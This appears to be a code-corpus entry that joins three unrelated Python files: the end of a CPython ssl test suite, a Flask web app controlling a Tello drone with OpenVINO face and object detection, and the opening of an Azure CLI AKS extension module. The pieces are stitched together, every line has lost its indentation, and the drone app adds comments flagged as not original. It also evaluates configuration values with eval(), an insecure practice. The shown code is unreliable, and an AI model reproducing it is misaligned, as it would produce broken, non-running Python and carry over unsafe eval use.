def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if expected is None and IS_OPENSSL_1_1:
# OpenSSL 1.1.0 raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
app.py
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) 2014 Miguel Grinberg
#
# Released under the MIT license
# https://github.com/miguelgrinberg/flask-video-streaming/blob/master/LICENSE
#
###############################################################################
from flask import Flask, Response, render_template, request, jsonify
from lib.camera import VideoCamera
import argparse
import configparser
import socket
import json
import sys
import threading
import re
from time import sleep
from logging import getLogger, basicConfig, DEBUG, INFO
from lib.args import build_argparser
from lib import interactive_detection
from openvino.inference_engine import get_version
app = Flask(__name__)
config = configparser.ConfigParser()
config.read('tello.cfg')
flip_code = eval(config.get('camera', 'flip_code'))
tello_addr = eval(config.get('tello', 'tello_addr'))
speed = eval(config.get('tello', 'speed'))
config = configparser.ConfigParser()
config.read('color.ini')
colors = config.sections()
logger = getLogger(__name__)
basicConfig(
level=INFO,
format="%(asctime)s %(levelname)s %(name)s %(funcName)s(): %(message)s")
distance = 20
move_command = ("up", "down", "left", "right", "back", "forward", "cw", "ccw")
is_connected = False
is_streamon = False
is_stream = True
is_tracking = False
is_test = False
is_async_mode = True
is_object_detection = False
is_face_detection = False
is_age_gender_detection = False
is_emotions_detection = False
is_head_pose_detection = False
is_facial_landmarks_detection = False
flip_code = None  # flip_code: 0 = x-axis, 1 = y-axis, -1 = both axes
tello_response = ""
devices = None
models = None
detections = None
def send_info(command, tello_response):
result = {
"command": command,
"result": tello_response,
"is_connected": is_connected,
"is_streamon": is_streamon,
"is_stream": is_stream,
"is_tracking": is_tracking,
"is_test": is_test,
"is_async_mode": is_async_mode,
"flip_code": flip_code,
"is_object_detection": is_object_detection,
"is_face_detection": is_face_detection,
"is_age_gender_detection": is_age_gender_detection,
"is_emotions_detection": is_emotions_detection,
"is_head_pose_detection": is_head_pose_detection,
"is_facial_landmarks_detection": is_facial_landmarks_detection
}
logger.info(
"cmd:{} res:{} con:{} streamon:{} stream:{} tracking:{} test:{} \
ssd:{} face:{} ag:{} em:{} hp:{} lm:{} async:{} flip:{}"
.format(command, tello_response, is_connected, is_streamon, is_stream,
is_tracking, is_test, is_object_detection, is_face_detection,
is_age_gender_detection, is_emotions_detection,
is_head_pose_detection, is_facial_landmarks_detection,
is_async_mode, flip_code))
return result
def send_command(command):
command = command.encode(encoding="utf-8")
s.sendto(command, (tello_addr))
logger.info("sent:{}".format(command))
sleep(0.1)
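# Assumption (setup not shown in this excerpt): `s` is a UDP socket created in
# the startup code together with a listener that fills in `tello_response`
# from the drone's replies. A minimal sketch of that setup might look like:
#
#     s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     s.bind(('', 9000))            # local port for Tello SDK replies (example value)
#     send_command("command")       # enter SDK mode, then e.g. send_command("takeoff")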
def gen(camera):
while True:
frame = camera.get_frame(is_stream, is_tracking, is_test, speed,
is_async_mode, flip_code, is_object_detection,
is_face_detection, is_age_gender_detection,
is_emotions_detection, is_head_pose_detection,
is_facial_landmarks_detection)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
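# Note (not part of the original app): gen() yields a multipart/x-mixed-replace
# body, i.e. an MJPEG stream in which every part is a complete JPEG frame.
# A quick sanity check from Python (hypothetical host/port):
#
#     import urllib.request
#     stream = urllib.request.urlopen("http://localhost:5000/video_feed")
#     print(stream.read(200))   # first multipart boundary plus the JPEG header
#
# In the browser, index.html presumably just points an <img> tag at
# /video_feed, the usual pattern for this kind of Flask streaming app.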
@app.route('/')
def index():
global is_connected
global is_streamon
logger.info(
"is_connected:{} is_streamon:{}".format(is_connected, is_streamon))
return render_template(
'index.html',
is_streamon=is_streamon,
is_connected=is_connected,
is_async_mode=is_async_mode,
devices=devices,
models=models,
enable_detection=enable_detection)
@app.route('/video_feed')
def video_feed():
camera = VideoCamera(s, algorithm, target_color, is_stream, is_test, speed,
detections)
return Response(
gen(camera), mimetype='multipart/x-mixed-replace; boundary=frame')
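# index.html typically consumes this stream with something like
# <img src="/video_feed">; the multipart response keeps that image updating.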
@app.route('/tellooo', methods=['POST'])
def tellooo():
global is_connected
global is_streamon
global speed
global distance
command = request.json['command']
if command in move_command:
command = command + " " + str(distance)
if re.search(r'speed \d+', command):
command = re.search(r'speed \d+', command).group(0)
speed = int(command.split(" ")[1])
if re.search(r'distance \d+', command):
command = re.search(r'distance \d+', command).group(0)
distance = int(command.split(" ")[1])
if re.search(r'flip [l,r,f,b]', command):
command = re.search(r'flip [l,r,f,b]', command).group(0)
send_command(command)
if command == 'command' and tello_response == 'ok':
is_connected = True
if command == 'streamon' and tello_response == 'ok':
is_streamon = True
if command == 'streamoff' and tello_response == 'ok':
is_streamon = False
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
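# Minimal client sketch (hypothetical host/port; the route expects JSON with a
# "command" key and returns the status dict serialized under "ResultSet"):
#   import requests, json
#   r = requests.post("http://127.0.0.1:5000/tellooo", json={"command": "takeoff"})
#   status = json.loads(r.json()["ResultSet"])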
@app.route('/info', methods=['POST'])
def info():
command = request.json['command']
send_command(command)
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
@app.route('/flip', methods=['POST'])
def flip():
global flip_code
command = request.json['command']
if command == "flip" and flip_code is None:
flip_code = 0
tello_response = "around x-axis"
elif command == "flip" and flip_code == 0:
flip_code = 1
tello_response = "around y-axis"
elif command == "flip" and flip_code == 1:
flip_code = -1
tello_response = "around both-axis"
elif command == "flip" and flip_code == -1:
flip_code = None
tello_response = "reset"
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
@app.route('/tracking', methods=['POST'])
def tracking():
global is_stream
global is_test
global is_tracking
global is_object_detection
global is_face_detection
tello_response = "on"
command = request.json['command']
if command == "streaming":
is_stream = True
is_tracking = False
is_test = False
is_object_detection = False
is_face_detection = False
elif command == "tracking":
is_stream = False
is_tracking = True
is_test = False
is_object_detection = False
is_face_detection = False
elif command == "test":
is_stream = False
is_tracking = True
is_test = True
is_object_detection = False
is_face_detection = False
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
@app.route('/detection', methods=['POST'])
def detection():
global is_async_mode
global is_stream
global is_tracking
global is_test
global is_object_detection
global is_face_detection
global is_age_gender_detection
global is_emotions_detection
global is_head_pose_detection
global is_facial_landmarks_detection
tello_response = "on"
command = request.json['command']
if is_object_detection or is_face_detection:
if command == "async":
is_async_mode = True
elif command == "sync":
is_async_mode = False
if command == "object_detection":
is_stream = False
is_tracking = False
is_test = False
is_object_detection = True
is_face_detection = False
if command == "face_detection":
is_stream = False
is_tracking = False
is_test = False
is_object_detection = False
is_face_detection = True
if is_face_detection:
if command == "age_gender_detection":
is_age_gender_detection = not is_age_gender_detection
if command == "emotions_detection":
is_emotions_detection = not is_emotions_detection
if command == "head_pose_detection":
is_head_pose_detection = not is_head_pose_detection
if command == "facial_landmarks_detection":
is_facial_landmarks_detection = not is_facial_landmarks_detection
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
if __name__ == '__main__':
args = build_argparser().parse_args()
algorithm = args.algorithm
target_color = args.color
is_test = args.test
enable_detection = args.enable_detection
if enable_detection:
devices = [
args.device, args.device, args.device_age_gender,
args.device_emotions, args.device_head_pose,
args.device_facial_landmarks
]
models = [
args.model_ssd, args.model_face, args.model_age_gender,
args.model_emotions, args.model_head_pose,
args.model_facial_landmarks
]
# openvino.inference_engine version '2.1.37988' is openvino_2020.1.033 build
# , which does not need cpu extension.
# https://software.intel.com/en-us/forums/intel-distribution-of-openvino-toolkit/topic/848825
if "CPU" in devices and args.cpu_extension is None and (get_version() < '2.1.37988'):
print(
"\nPlease try to specify cpu extensions library path in demo's command line parameters using -l "
"or --cpu_extension command line argument")
sys.exit(1)
# Create detectors class instance
detections = interactive_detection.Detections(
devices, models, args.cpu_extension, args.plugin_dir,
args.prob_threshold, args.prob_threshold_face, is_async_mode)
models = detections.models # Get models to display WebUI.
# Create a UDP socket to send and receive message with tello
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
host = '0.0.0.0'
port = 9000
s.bind((host, port))
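        # Background reader: block on recvfrom() and publish the drone's last
        # reply through the global tello_response, which the routes report back.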
def recv():
global tello_response
while True:
try:
tello_response, server = s.recvfrom(1518)
tello_response = tello_response.decode(encoding="utf-8")
logger.info("res:{}".format(tello_response))
except Exception:
print('\nExit . . .\n')
break
recvThread = threading.Thread(target=recv)
recvThread.start()
app.run(host='0.0.0.0', threaded=True)
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core._profile import Profile
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_05_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
MaintenanceConfiguration,
TimeInWeek,
TimeSpan,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity,
RunCommandRequest,
ManagedClusterPropertiesIdentityProfileValue)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, CONST_SECRET_ROTATION_ENABLED
from ._consts import CONST_AZURE_DEFENDER_ADDON_NAME, CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import ADDONS
from .maintenanceconfiguration import aks_maintenanceconfiguration_update_internal
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break
        except URLError:
            time.sleep(1)
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
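# Illustrative example (made-up ids): _get_default_dns_prefix("myCluster!", "my-rg", "0123456789ab...")
# -> "myCluster-my-rg-012345" (name capped at 10 chars, resource group at 16, subscription id at 6)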
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
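# The resulting acsServicePrincipal.json is keyed by subscription id, roughly:
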